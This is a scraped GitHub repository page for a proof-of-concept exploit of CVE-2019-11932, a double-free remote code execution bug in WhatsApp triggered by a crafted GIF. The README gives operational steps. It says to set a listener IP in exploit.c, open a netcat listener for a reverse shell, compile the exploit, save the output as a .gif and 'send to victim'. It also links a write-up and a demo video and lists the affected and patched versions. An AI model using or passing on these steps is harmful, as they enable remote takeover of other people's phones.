Skip to content

5l1v3r1/CVE-2019-11932

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2019-11932

double-free bug in WhatsApp exploit poc.

#Note: make sure to set the listner ip in exploit.c inorder to get shell

nc -lvp 5555 or whatever port.

and then compile.

gcc -o exploit egif_lib.c exploit.c

then run ./exploit and save the content to .gif

and send to victim.

#Source https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.

#Poc_Video https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view.

#News_Article https://gbhackers.com/whatsapp-double-free-vulnerability/

About

The exploit works well until WhatsApp version 2.19.230. The vulnerability is official patched in WhatsApp version 2.19.244

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages